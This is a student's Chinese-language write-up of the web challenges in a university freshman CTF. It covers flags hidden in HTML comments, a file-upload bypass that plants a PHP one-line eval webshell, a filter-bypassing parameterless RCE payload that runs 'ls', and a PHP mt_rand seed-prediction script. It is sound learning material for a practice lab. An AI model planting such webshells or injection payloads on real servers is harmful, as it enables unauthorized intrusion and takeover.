WSCTF--江苏大学新生赛解题笔记及反思
这是我这个菜鸡小白开始学习CTF的起点,所以简单记录一下喵
因为是菜鸡所以只记录一下web方向(其实misc也可以记录一下,但是我有点懒,还是算了)
目录
读江大信安,享__人生
我们网络安全行业正在蒸蒸日上,访问/index.html有烟花
web签到题
创建实例并进入,发现是403,所以根据提示在url后加上/index.html
烟花好看捏
f12查看源码
有点长就不贴了
翻到末尾发现一段注释
<!--flag{2024_UJ8_CTF}-->
得到flag
一道题带你走进二游
(请访问/index.html)以下内容由ai生成
游戏名称:
《星际幻界:多元交汇》
游戏简介:
在遥远的未来,宇宙的边界被未知的力量撕裂,形成了连接不同次元的“幻界门扉”。在这个时代,科技与魔法共存,文明与异界交织,七大世界的力量意外交汇于一个名为“星际幻界”的神秘领域。玩家将扮演一名来自地球的探险家,穿越幻界门扉,探索这些异彩纷呈的世界,揭开宇宙最深的秘密,并守护这片多元宇宙免受未知威胁的侵扰。
游戏特色:
多元世界融合:
游戏融合了《原神》的奇幻大陆、《碧蓝航线》的海上冒险、《绝区零》的废墟都市、《鸣潮》的科幻废墟、《明日方舟》的末日塔防、《崩坏星穹铁道》的银河列车旅行,以及《崩坏3》的崩坏世界设定,创造出一个前所未有的多元宇宙冒险体验。
独特角色收集:
每个世界都有其独特的英雄与伙伴,从原神的精灵法师到碧蓝航线的舰娘,再到绝区零的异能者、鸣潮的异能战士、明日方舟的感染者干员、星穹铁道的星际旅人,以及崩坏系列的女武神,玩家可以组建自己的跨次元队伍,共同战斗。
策略战斗系统:
结合即时战斗与策略塔防元素,玩家需要根据不同敌人的特性,灵活调整队伍配置与技能释放时机,体验深度策略的乐趣。同时,引入“共鸣共鸣”机制,不同世界的角色间能产生特殊联动,增强团队战力。
开放世界探索:
广阔的星际幻界由多个风格迥异的开放世界组成,玩家可以自由探索未知领域,解开谜题,发现隐藏的宝藏与秘密,与NPC建立深厚羁绊,逐步揭示世界的真相。
多元剧情体验:
游戏拥有庞大的世界观和错综复杂的剧情线,玩家的选择将影响故事的走向和角色的命运。通过完成主线任务与丰富的支线任务,逐步揭开多元宇宙背后的巨大阴谋。
创新社交互动:
除了单人冒险外,游戏还支持多人合作与竞技模式。玩家可以与好友组队挑战高难度副本,或在竞技场中一决高下,享受团队协作与竞技对抗的乐趣。 《星际幻界:多元交汇》是一场跨越次元的奇幻之旅,邀你与来自不同世界的英雄并肩作战,共同书写属于你们的宇宙传奇!
题目难绷
题目内容也难绷
总之进去看到一大段话,flag就藏在这些话中
直接f12大法,在元素里方便寻找一点
找到三段flag
<!--f|l|a|g{yong_--><!--chu_--><!--xuelian}-->
拼接一下
flag{yong_chu_xuelian}
这flag怎么又有点罕见又有点唐氏
upload
朴实无华的一道题
直接构造上传一个有一句马的php文件
<?php @eval($_POST['attack']);?>(此处attack是密码,后面要考: )
回显如下:
Sorry, we only allow uploading GIF images
好吧还是有点过滤的,那我们把后缀名改为gif然后上传的时候用burpsuite抓包在改回去
这里我犯懒了就不贴图了
上传成功后得到url后缀名的提示,然后就可以用蚁剑连接了
在蚁剑输入url和密码,测试连接后再保存
然后右键选择文件管理,就能看到所有的文件了,flag就在一个文件夹里(具体忘了在哪)
离子称的秘密
这是离子称学长的服务器,藏着学长的小秘密,请你找出学长的秘密(flag为二字中文,请以flag{}形式提交)
进入实例后就看到了一段代码
这是离子称学长的七度空间,藏着学长的小秘密 <?php
if(isset($_GET['lzc'])){
$lzc=$_GET['lzc'];
if(!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$lzc)){
eval($lzc);
}
}
else{
echo "这是离子称学长的七度空间,藏着学长的小秘密";
}
show_source(__FILE__);
?>一眼看到了get传参和一大片的过滤,但是经过实验发现可以用反斜杠绕过过滤(后来看官方wp发现这个方法非预期了,但是没关系,能做出题就是好方法)
但是说实话我虽然试出来\能绕过也没解出来,我是fw
大佬说是无参rce
?lzc=eval(end(pos(get_defined_vars())));&1=echo `ls ./`;
找到力
难绷
不难看出,flag是{学妹}
学长还在蒸
不小心把源码放在index.rar,php环境为5.6
这个其实还蛮简单的,但是当时我是刚开始学的fw,所以不会写,但是现在会了喵
直接启动
沟槽的三国杀,我要给他刷差评
根据提示直接构造url/?id=a试一试
然后url就会变成这样
/?id=d&money=648尝试一下改money的值,然后
不就开个桂吗直接给我flag多好
然后当时的我就瓶颈了(归根结底还是因为懒不会写脚本)
所以我直接给官方wp的脚本cv过来
$ccc=time();
$ttt=substr($ccc, 0, 7);
mt_srand($ttt);
for($i =0; $i <= 100; $i++){
if($i == 100){
$shenhe = mt_rand();
echo $shenhe;
}
else{
mt_rand();
};跑出结果再post给c就行(我就不跑了,再跑我就要跑路了)
🐔🐔🐔🐔🐔
flag{}的格式提交flag
据说是为了防止被ak才出的
不会写,直接跳过
贴一个官方wp
总结
题目对于新手还是很友好的(但我是fw),等我学成归来,直接给下一届出更整活更优秀的题,让下一届新生飞起来 让下一届新生更好入门CTF,加入我们大家庭
浙公网安备 33010602011771号